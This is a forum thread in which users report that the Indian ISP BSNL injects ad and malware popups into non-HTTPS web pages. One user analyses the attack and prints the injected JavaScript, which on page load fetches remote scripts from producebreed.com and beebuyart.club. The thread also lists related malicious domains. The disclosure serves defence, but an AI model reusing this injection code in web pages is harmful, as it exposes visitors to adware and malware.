BSNL is inserting ads in websites, sending their users to malware sites through malware code injection
- Thread starter CRACING
- Start date
- Featured
- Replies 645
- Views 199,741
varkey
I got banned!
This is still happening for me and it's really irritating. For now I just blocked any traffic to 117.0.0.0/8 port 3000 This won't work, see next post.
As @Sokris suggested in the other thread BSNL Broadband: Ad Injection, Random Redirection to Malware Websites | BSNL Broadband, I've submitted a complaint through the BSNL grievance page. Hope they fix it.
As @Sokris suggested in the other thread BSNL Broadband: Ad Injection, Random Redirection to Malware Websites | BSNL Broadband, I've submitted a complaint through the BSNL grievance page. Hope they fix it.
Last edited:
varkey
I got banned!
It appears the old way of injecting the code that gets pulled from servers hosted by BSNL has changed.
On tracking the popups, the following code gets injected to the JS file served from the non-HTTPS website (mostly jquery related files)
The particular JS gets called once the page gets loaded and adds some more JS code from the URL
Now this javascript triggers popups from a whole bunch of other domains like
This is a very shady move from BSNL just to get some ad revenue and is subjecting the users to malware/adware. The majority of BSNL's users may not be technically savvy to realise this or add measures to block such things causing their devices to be infected by such malware/adware.
On tracking the popups, the following code gets injected to the JS file served from the non-HTTPS website (mostly jquery related files)
JavaScript:
document.addEventListener('DOMContentLoaded', function() {
var esp = document.createElement('span');
var esr = document.createElement('script');
esr.src = 'http://producebreed.com/rveYQkug53SsOr/6933?ndn=er';
esr.type = 'text/javascript';
esp.appendChild(esr);
document.body.appendChild(esp);
}, false);The particular JS gets called once the page gets loaded and adds some more JS code from the URL
http://producebreed.com/rveYQkug53SsOr/6933?ndn=er. The second and third part of the URL varies dynamically. But so far I noticed the JS being served only from producebreed.com, however I'm sure there would be many other such domains being used.Now this javascript triggers popups from a whole bunch of other domains like
areantaid.site, arcaptart.site, allashark.siteThis is a very shady move from BSNL just to get some ad revenue and is subjecting the users to malware/adware. The majority of BSNL's users may not be technically savvy to realise this or add measures to block such things causing their devices to be infected by such malware/adware.
varkey
I got banned!
Another domain being used 
beebuyart.club
JavaScript:
document.addEventListener('DOMContentLoaded', function() {
var esp = document.createElement('span');
var esr = document.createElement('script');
esr.src = 'http://beebuyart.club/rJCq50N0NFLDj/6932?ndn=ch2';
esr.type = 'text/javascript';
esp.appendChild(esr);
document.body.appendChild(esp);
}, false);
vignesh_venkatesan
Professional Procrastinator
They have malware sitting on their servers.
When I was using BSNL BB, I used to get shady pops every now and then. This is seriously f**ked up, but some ISP uses Injection for bill payment reminders too.
But no other ISP in my knowledge do these kinda shit.
When I was using BSNL BB, I used to get shady pops every now and then. This is seriously f**ked up, but some ISP uses Injection for bill payment reminders too.
But no other ISP in my knowledge do these kinda shit.
@vignesh_venkatesan @varkey Is this adware injection problem on non encrypted (http pages) also happens in bsnl FTTH or only limited to dsl broadband?
vignesh_venkatesan
Professional Procrastinator
varkey
I got banned!
Yep for both. So for now I've blocked the malicious domains which are part of this at the DNS level. The domains are
I also noticed that for most sites I checked, they seem to target the jquery JS file. And this in some cases is not even hosted by affected site, its hosted by Google but then they are linking to the non-HTTPS version.
Here is the modified jquery JS file fetched from http://ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js
Source
I also noticed that for most sites I checked, they seem to target the jquery JS file. And this in some cases is not even hosted by affected site, its hosted by Google but then they are linking to the non-HTTPS version.
Here is the modified jquery JS file fetched from http://ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js
Source
Last edited: